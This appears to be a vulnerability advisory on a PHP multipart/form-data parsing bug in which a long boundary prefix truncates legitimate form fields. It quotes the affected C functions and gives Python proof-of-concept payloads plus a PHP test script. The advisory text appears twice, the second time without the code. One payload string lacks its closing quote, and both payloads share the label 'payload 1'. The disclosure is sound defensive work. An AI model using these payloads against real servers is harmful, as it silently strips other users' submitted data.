Summary
Erroneous parsing of multipart form data contained in an HTTP POST request could lead to legitimate data not being processed thus, violating data integrity.
Details
A bug was discovered in the parsing of multipart form data contents, affecting both file and input form data. If a multipart form data payload contains a valid prefix X
of the defined boundary B
such that 5Kib
< |X|
< |B|
< 8Kib
, the logic responsible for parsing and storing the multipart payload fails to correctly extract the contents between two boundaries. This results in a violation of data integrity. The issue lies in the partial match handling in the following function:
// main/rfc1867.c:556
/*
* Search for a string in a fixed-length byte string.
* If partial is true, partial matches are allowed at the end of the buffer.
* Returns NULL if not found, or a pointer to the start of the first match.
*/
static void *php_ap_memstr(char *haystack, int haystacklen, char *needle, int needlen, int partial)
{
int len = haystacklen;
char *ptr = haystack;
/* iterate through first character matches */
while( (ptr = memchr(ptr, needle[0], len)) ) {
/* calculate length after match */
len = haystacklen - (ptr - (char *)haystack); //
if (memcmp(needle, ptr, needlen < len ? needlen : len) == 0 && (partial || len >= needlen)) { // partial match here if partial != 0
break;
}
/* next character */
ptr++; len--;
}
return ptr;
}
This is called by the following functions when the contents between two boundaries have to be extracted after parsing the MIME headers:
// main/rfc1867.c:580
static size_t multipart_buffer_read(multipart_buffer *self, char *buf, size_t bytes, int *end)
{
size_t len, max;
char *bound;
/* fill buffer if needed */
if (bytes > (size_t)self->bytes_in_buffer) {
fill_buffer(self);
}
int i=0;
while (self->buf_begin[i] && self->buf_begin[i] != '\r' ) i++;
/* look for a potential boundary match, only read data up to that point */
if ((bound = php_ap_memstr(self->buf_begin, self->bytes_in_buffer, self->boundary_next, self->boundary_next_len, 1))) { // partial match on
max = bound - self->buf_begin;
if (end && php_ap_memstr(self->buf_begin, self->bytes_in_buffer, self->boundary_next, self->boundary_next_len, 0)) {
*end = 1;
}
} else {
max = self->bytes_in_buffer;
}
/* maximum number of bytes we are reading */
len = max < bytes-1 ? max : bytes-1;
/* if we read any data... */
if (len > 0) {
/* copy the data */
memcpy(buf, self->buf_begin, len);
buf[len] = 0;
if (bound && len > 0 && buf[len-1] == '\r') {
buf[--len] = 0;
}
/* update the buffer */
self->bytes_in_buffer -= (int)len;
self->buf_begin += len;
}
return len;
}
/*
XXX: this is horrible memory-usage-wise, but we only expect
to do this on small pieces of form data.
*/
static char *multipart_buffer_read_body(multipart_buffer *self, size_t *len)
{
char buf[FILLUNIT], *out=NULL; // FILLUNIT = 5*1024
size_t total_bytes=0, read_bytes=0;
while((read_bytes = multipart_buffer_read(self, buf, sizeof(buf), NULL))) {
out = erealloc(out, total_bytes + read_bytes + 1);
memcpy(out + total_bytes, buf, read_bytes);
total_bytes += read_bytes;
}
if (out) {
out[total_bytes] = '\0';
}
*len = total_bytes;
return out;
}
PoC
The below python
payload was used in a PHP-FPM environment coupled with a Nginx server. No particular configuration was used to couple the services. Two payloads triggering the bug are presented below:
# payload 1 - the string "\r\n--e932" is not included in the constructed data structure later
# on submitted to a PHP script
boundary = "e932eddb2559cca708c5cb806f24abfb
content_type = f"multipart/form-data; boundary={boundary}"
msg2 = f'--{boundary}\r\nContent-Disposition: form-data; name="koko"\r\n\r\n' \
+ 'A'*(5068+44) + f'\r\n--e932\n--{boundary}--'
# payload 1 - the payload "\r\n--{boundary[:len(boundary)-5]}' + 'C'*100 " is again not included
# in the constructed data structure later on submitted to a PHP script
boundary = 'A'*(6*1024)
content_type = f"multipart/form-data; boundary={boundary}"
body = f'--{boundary}\r\n' + 'Content-Disposition: form-data; name="koko"\r\n\r\n' \
+ f'BBB\r\n--{boundary[:len(boundary)-5]}' + 'C'*100 + f"\r\n--{boundary}--"
The above payloads illustrate that a prefix of the boundary is considered as a valid boundary and the processing of what is after this prefix stops.
The PHP script which can be use to illustrate the bug by writing the contents of the form into a file is the following:
$name = $_POST['koko'];
$file_path = '/tmp/parsing-bug.txt';
$file = fopen($file_path, 'w');
if ($file) {
fwrite($file, $name . PHP_EOL);
fclose($file);
echo 'The name has been successfully written to the file.';
}
To confirm that the 100 "C"s from the second payload are not included in the resulting file:
# tr -cd 'C' < /tmp/parsing-bug.txt | wc -c
0
Impact
The parsing bug violates data integrity. In the context where an attacker is capable of inserting a maliciously crafted payload at a desired location alongside other legitimate user payloads and is under control of other request parts such as the boundary, they can exclude portions of the legitimate data.
Summary
Erroneous parsing of multipart form data contained in an HTTP POST request could lead to legitimate data not being processed thus, violating data integrity.
Details
A bug was discovered in the parsing of multipart form data contents, affecting both file and input form data. If a multipart form data payload contains a valid prefix
X
of the defined boundaryB
such that5Kib
<|X|
<|B|
<8Kib
, the logic responsible for parsing and storing the multipart payload fails to correctly extract the contents between two boundaries. This results in a violation of data integrity. The issue lies in the partial match handling in the following function:This is called by the following functions when the contents between two boundaries have to be extracted after parsing the MIME headers:
PoC
The below
python
payload was used in a PHP-FPM environment coupled with a Nginx server. No particular configuration was used to couple the services. Two payloads triggering the bug are presented below:The above payloads illustrate that a prefix of the boundary is considered as a valid boundary and the processing of what is after this prefix stops.
The PHP script which can be use to illustrate the bug by writing the contents of the form into a file is the following:
To confirm that the 100 "C"s from the second payload are not included in the resulting file:
# tr -cd 'C' < /tmp/parsing-bug.txt | wc -c 0
Impact
The parsing bug violates data integrity. In the context where an attacker is capable of inserting a maliciously crafted payload at a desired location alongside other legitimate user payloads and is under control of other request parts such as the boundary, they can exclude portions of the legitimate data.